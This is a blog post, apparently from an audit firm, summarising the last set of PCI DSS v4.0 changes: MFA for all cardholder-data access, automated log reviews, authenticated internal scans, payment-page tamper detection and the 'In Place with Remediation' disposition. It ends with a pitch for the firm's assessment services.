In the last part of our “Understanding PCI DSS v4.0” series, we’ll tackle the remaining changes in PCI DSS v4.0 that are likely to impact your day-to-day business practices.
Over the course of our article series, we’ve explored a number of changes brought about by PCI DSS v4.0. While not a completely comprehensive evaluation, our goal has been to create a reference that highlights how the switch to PCI DSS v4.0 might impact a typical service provider or merchant.
PCI DSS v4.0 Key Changes – Part 3
Multifactor Authentication for All CDE Access – Multifactor authentication will now be required for all CDE access.
o This requirement is a best practice until March 31, 2025.
· Mandatory Automated Log Reviews – Your assessor will need to examine log review mechanisms and also interview personnel in order to verify that automated mechanisms are being used to perform log reviews.
o This requirement is a best practice until March 31, 2025.
· Authenticated Internal Scans – The rules regarding internal vulnerability scans now specifically address authentication. Authenticated scanning must be performed as follows: Any systems that are unable to accept credentials for authenticated scanning must be documented, sufficient privileges must be used for systems related to authenticated scanning, if accounts used for authenticated scanning can be used for interactive login, then they must be managed according to requirement 8.2.2.
o This requirement is a best practice until March 31, 2025.
· Change Detection Mechanism Deployed for Payment Pages – According to the requirement, your organization will need to deploy a change-and-tamper detection mechanism to alert for modifications to HTTP headers and contents of payment pages as received by the consumer browser. This is meant to detect activity that may be part of a skimming attack.
o This requirement is a best practice until March 31, 2025.
· Allowance for In Place with Remediation – This is a new category added to the list of possible dispositions of each requirement. Receiving this disposition means that at some point during the PCI DSS assessment period the control failed validation testing but was remediated and put in place before the end of the assessment.
o In cases of In Place with Remediation, the assessor will need assurance that the entity has addressed the reason for the failed control, the implementation of the control, and the ongoing processes to prevent the re-occurrence of the control failure.
Partner with an Auditwerx QSA
When it comes to changes to the PCI DSS, you aren’t on your own. An Auditwerx QSA can help you understand the specifics behind PCI DSS v4.0 and how it will impact your organization. Contact us today to start your PCI compliance journey.